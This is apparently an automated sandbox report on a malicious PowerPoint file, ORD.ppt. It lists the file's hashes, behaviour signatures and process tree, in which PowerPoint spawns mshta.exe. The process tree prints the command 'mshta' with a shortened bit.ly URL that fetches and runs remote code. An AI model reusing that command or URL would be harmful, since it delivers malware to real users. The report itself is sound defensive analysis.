730791498e622e20755f6b0100dd78dc66fd2e99f85aecf1d55626960c1260de

General

Target

ORD.ppt
Size

81KB
MD5

fb68f8be8c75736c63464b924ff7c33b
SHA1

6546c3af939be5e2a2bce5c03a8d89ec562665f6
SHA256

730791498e622e20755f6b0100dd78dc66fd2e99f85aecf1d55626960c1260de
SHA512

ef05425c38e63c78099ec4f43c80e9368d53890c75c19470d9dd715fcd169e3af7eec63a5fc078a2fba886974e962ed95fec3a26d3f5b71b079508cf2cc270de

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2976	772	mshta.exe	POWERPNT.EXE

Blocklisted process makes network request 13 IoCs

Processes:

mshta.exe

flow	pid	process
16	2976	mshta.exe
18	2976	mshta.exe
20	2976	mshta.exe
22	2976	mshta.exe
24	2976	mshta.exe
30	2976	mshta.exe
32	2976	mshta.exe
33	2976	mshta.exe
34	2976	mshta.exe
35	2976	mshta.exe
36	2976	mshta.exe
37	2976	mshta.exe
39	2976	mshta.exe

Process spawned suspicious child process 1 IoCs

This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

Processes:

DW20.EXE

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4080	772	DW20.EXE	POWERPNT.EXE

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3992 2976 WerFault.exe mshta.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

772 POWERPNT.EXE

pid	pid_target	process	target process
3992	2976	WerFault.exe	mshta.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

POWERPNT.EXEWerFault.exe

pid	process
772	POWERPNT.EXE
772	POWERPNT.EXE
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe
3992	WerFault.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

WerFault.exe

description pid process

Token: SeDebugPrivilege 3992 WerFault.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

POWERPNT.EXEmshta.exe

pid process

772 POWERPNT.EXE
2976 mshta.exe
Suspicious use of WriteProcessMemory 2 IoCs

Processes:

POWERPNT.EXE

description pid process target process

PID 772 wrote to memory of 2976 772 POWERPNT.EXE mshta.exe
PID 772 wrote to memory of 2976 772 POWERPNT.EXE mshta.exe

description	pid	process
Token: SeDebugPrivilege	3992	WerFault.exe

description	pid	process	target process
PID 772 wrote to memory of 2976	772	POWERPNT.EXE	mshta.exe
PID 772 wrote to memory of 2976	772	POWERPNT.EXE	mshta.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\ORD.ppt" /ou ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:772

C:\Windows\SYSTEM32\mshta.exe
mshta http://www.bitly.com/tyuwqghwqbsvaklajsmk
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetWindowsHookEx
PID:2976

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2976 -s 2516
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992

C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 3428
2⤵
- Process spawned suspicious child process
PID:4080

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\fed62c4804614a2e8d521af27bcedd27 /t 2452 /p 772
1⤵
PID:2252

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/772-114-0x00007FF8256F0000-0x00007FF825700000-memory.dmp

Filesize
64KB

Download
memory/772-115-0x00007FF8256F0000-0x00007FF825700000-memory.dmp

Filesize
64KB

Download
memory/772-116-0x00007FF8256F0000-0x00007FF825700000-memory.dmp

Filesize
64KB

Download
memory/772-117-0x00007FF8256F0000-0x00007FF825700000-memory.dmp

Filesize
64KB

Download
memory/772-119-0x00007FF8256F0000-0x00007FF825700000-memory.dmp

Filesize
64KB

Download
memory/772-118-0x00007FF847230000-0x00007FF848E0D000-memory.dmp

Filesize
27.9MB

Download
memory/772-122-0x00007FF843BA0000-0x00007FF844C8E000-memory.dmp

Filesize
16.9MB

Download
memory/772-123-0x00007FF8405B0000-0x00007FF8424A5000-memory.dmp

Filesize
31.0MB

Download
memory/772-130-0x00007FF821D50000-0x00007FF821D60000-memory.dmp

Filesize
64KB

Download
memory/772-131-0x00007FF821D50000-0x00007FF821D60000-memory.dmp

Filesize
64KB

Download
memory/2976-183-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads